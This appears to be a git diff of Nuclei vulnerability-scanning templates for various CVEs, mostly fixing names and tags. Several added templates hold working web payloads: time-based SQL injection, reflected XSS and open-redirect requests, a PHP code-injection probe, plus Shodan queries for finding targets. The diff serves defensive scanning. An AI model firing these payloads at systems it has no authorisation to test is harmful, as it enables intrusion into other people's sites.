- https://security.netapp.com/advisory/ntap-20200810-0002/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11110
|
||||
- https://hackerone.com/reports/1329433
|
||||
remediation: This issue can be resolved by updating Grafana to the latest version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-11991
|
||||
|
||||
info:
|
||||
name: Apache Cocoon 2.1.12 XML Injection
|
||||
name: Apache Cocoon 2.1.12 - XML Injection
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2020-13121
|
||||
|
||||
info:
|
||||
name: Submitty 20.04.01 - Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt.
|
||||
reference:
|
||||
- https://github.com/Submitty/Submitty/issues/5265
|
||||
- https://www.cvedetails.com/cve/CVE-2020-13121
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-13121
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2020,redirect,submitty,oos
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{RootURL}}/authentication/login
|
||||
|
||||
user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-13700
|
||||
|
||||
info:
|
||||
name: WordPresss acf-to-rest-api <=3.1.0- Insecure Direct Object Reference
|
||||
name: WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: |
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-13937
|
||||
|
||||
info:
|
||||
name: Apache Kylin Exposed Configuration File
|
||||
name: Apache Kylin - Exposed Configuration File
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2020-14408
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2022,cockpit,agentejo,xss,oss
|
||||
tags: cve,cve2020,cockpit,agentejo,xss,oss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -7,9 +7,9 @@ info:
|
|||
description: |
|
||||
Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.
|
||||
reference:
|
||||
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
|
||||
- https://github.com/oria/gridx/issues/433
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-19625
|
||||
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -19,23 +19,18 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();"
|
||||
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "6ca86c2c17047c14437f55c42c801c10"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>'
|
||||
|
||||
# Enhanced by mp on 2022/04/27
|
||||
|
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2020-21012
|
||||
|
||||
info:
|
||||
name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://github.com/hitIer/web_test/tree/master/hotel
|
||||
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-21012
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2020-21012
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2020,hotel,sqli,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /forgot_password.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
btn_forgot=1&email=1%27%20or%20sleep(6)%23
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(body, "Hotel Booking System")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2020-24902
|
||||
|
||||
info:
|
||||
name: Quixplorer <=2.4.1 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24902
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2020-24902
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-dork: intitle:"My Download Server"
|
||||
shodan-query: http.title:"My Download Server"
|
||||
verified: "true"
|
||||
tags: cve,cve2020,quixplorer,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>&srt=yes"
|
||||
- "My Download"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2020-24903
|
||||
|
||||
info:
|
||||
name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://seclists.org/bugtraq/2016/Mar/104
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2020-24903
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.component:"ASP.NET"
|
||||
verified: "true"
|
||||
tags: cve,cve2020,cuteeditor,xss,seclists
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script></p>"
|
||||
- "System.Web"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -4,7 +4,7 @@ id: CVE-2020-25213
|
|||
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
|
||||
|
||||
info:
|
||||
name: WordPress File Manager Plugin Remote Code Execution
|
||||
name: WordPress File Manager Plugin - Remote Code Execution
|
||||
author: foulenzer
|
||||
severity: critical
|
||||
description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-25223
|
||||
|
||||
info:
|
||||
name: Sophos UTM Preauth Remote Code Execution
|
||||
name: Sophos UTM Preauth - Remote Code Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-25506
|
||||
|
||||
info:
|
||||
name: D-Link DNS-320 Unauthenticated Remote Code Execution
|
||||
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-2551
|
||||
|
||||
info:
|
||||
name: Oracle WebLogic Server Remote Code Execution
|
||||
name: Oracle WebLogic Server - Remote Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
|
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2020-26248
|
||||
|
||||
info:
|
||||
name: PrestaShop Product Comments <4.2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: high
|
||||
description: |
|
||||
PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
|
||||
- https://packagist.org/packages/prestashop/productcomments
|
||||
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
|
||||
remediation: Fixed in 4.2.1.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
|
||||
cvss-score: 8.2
|
||||
cve-id: CVE-2020-26248
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2020,sqli,prestshop,packetstorm
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2020-29284
|
||||
|
||||
info:
|
||||
name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48984
|
||||
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
|
||||
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2020-29284
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2020,tablereservation,sqli,unauth,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Restaurent Tables"
|
||||
- "Chair List"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-35729
|
||||
|
||||
info:
|
||||
name: Klog Server <=2.41- Unauthenticated Command Injection
|
||||
name: Klog Server <=2.41 - Unauthenticated Command Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-35846
|
||||
|
||||
info:
|
||||
name: Agentejo Cockpit < 0.11.2 NoSQL Injection
|
||||
name: Agentejo Cockpit < 0.11.2 - NoSQL Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-35847
|
||||
|
||||
info:
|
||||
name: Agentejo Cockpit <0.11.2 NoSQL Injection
|
||||
name: Agentejo Cockpit <0.11.2 - NoSQL Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-20114
|
||||
|
||||
info:
|
||||
name: TCExam <= 14.8.1 Sensitive Information Exposure
|
||||
name: TCExam <= 14.8.1 - Sensitive Information Exposure
|
||||
author: push4d
|
||||
severity: high
|
||||
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.
|
||||
|
|
|
@ -0,0 +1,54 @@
|
|||
id: CVE-2021-20323
|
||||
|
||||
info:
|
||||
name: Keycloak < 18.0.0 - Cross Site Scripting
|
||||
author: ndmalc
|
||||
severity: medium
|
||||
description: |
|
||||
Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact.
|
||||
reference:
|
||||
- https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j
|
||||
- https://bugzilla.redhat.com/show_bug.cgi?id=2013577
|
||||
- https://access.redhat.com/security/cve/CVE-2021-20323
|
||||
- https://github.com/ndmalc/CVE-2021-20323
|
||||
- https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20323
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-20323
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: html:"Keycloak"
|
||||
verified: "true"
|
||||
tags: cve,cve2021,keycloak,xss
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/auth/realms/master/clients-registrations/default"
|
||||
- "{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect"
|
||||
- "{{BaseURL}}/realms/master/clients-registrations/default"
|
||||
- "{{BaseURL}}/realms/master/clients-registrations/openid-connect"
|
||||
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
|
||||
body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Unrecognized field "Test<img src=x onerror=alert(document.domain)>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 400
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2021-24827
|
||||
|
||||
info:
|
||||
name: Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Asgaros Forum WordPress plugin before 1.15.13 does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
|
||||
- https://wordpress.org/plugins/asgaros-forum/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24827
|
||||
- https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-24827
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "asgarosforum")'
|
||||
condition: and
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2021-25099
|
||||
|
||||
info:
|
||||
name: Give < 2.17.3 - Cross-Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
The GiveWP WordPress plugin before 2.17.3 does not sanitise and escape the form_id parameter before outputting it back in the response of an unauthenticated request via the give_checkout_login AJAX action, leading to a Reflected Cross-Site Scripting.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f
|
||||
- https://wordpress.org/plugins/give/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25099
|
||||
classification:
|
||||
cve-id: CVE-2021-25099
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2021,wordpress,wp-plugin,wp,xss,give,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
action=give_checkout_login&form_id=xxxxxx"><script>alert(document.domain)</script>
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "<script>alert(document.domain)</script>")'
|
||||
- 'contains(body, "give_user_login")'
|
||||
condition: and
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2021-3110
|
||||
|
||||
info:
|
||||
name: PrestaShop 1.7.7.0 - SQL Injection
|
||||
author: Jaimin Gondaliya
|
||||
severity: critical
|
||||
description: |
|
||||
PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
|
||||
- https://www.exploit-db.com/exploits/49410
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-3110
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,prestshop,edb
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-31682
|
||||
|
||||
info:
|
||||
name: WebCTRL OEM <= 6.5 Cross-Site Scripting
|
||||
name: WebCTRL OEM <= 6.5 - Cross-Site Scripting
|
||||
author: gy741,dhiyaneshDk
|
||||
severity: medium
|
||||
description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2021-33851
|
||||
|
||||
info:
|
||||
name: Customize Login Image < 3.5.3 - Cross-Site Scripting
|
||||
name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
|
||||
author: 8authur
|
||||
severity: medium
|
||||
description: |
|
||||
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
|
||||
WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
|
||||
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
|
||||
|
@ -62,3 +62,5 @@ requests:
|
|||
regex:
|
||||
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
|
||||
internal: true
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-35380
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
|
||||
tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -16,7 +16,9 @@ info:
|
|||
cve-id: CVE-2021-35587
|
||||
cwe-id: CWE-502
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: body="/oam/pages/css/login_page.css"
|
||||
shodan-query: http.title:"Oracle Access Management"
|
||||
tags: cve,cve2021,oam,rce,java,unauth,oracle,kev
|
||||
|
||||
requests:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-37704
|
||||
|
||||
info:
|
||||
name: phpinfo Resource Exposure
|
||||
name: phpfastcache - phpinfo Resource Exposure
|
||||
author: whoever
|
||||
severity: medium
|
||||
description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.
|
||||
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 4.3
|
||||
cve-id: CVE-2021-37704
|
||||
cwe-id: CWE-668
|
||||
tags: cve,cve2021,exposure,phpfastcache,phpinfo
|
||||
tags: cve,cve2021,exposure,phpfastcache,phpinfo,phpsocialnetwork
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -23,6 +23,7 @@ requests:
|
|||
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php"
|
||||
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-38751
|
||||
|
||||
info:
|
||||
name: ExponentCMS <= 2.6 Host Header Injection
|
||||
name: ExponentCMS <= 2.6 - Host Header Injection
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-40438
|
||||
|
||||
info:
|
||||
name: Apache <= 2.4.48 Mod_Proxy SSRF
|
||||
name: Apache <= 2.4.48 - Mod_Proxy SSRF
|
||||
author: pdteam
|
||||
severity: critical
|
||||
description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-41174
|
||||
|
||||
info:
|
||||
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
|
||||
name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
|
||||
author: daffainfo,666asd
|
||||
severity: high
|
||||
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
||||
description: |
|
||||
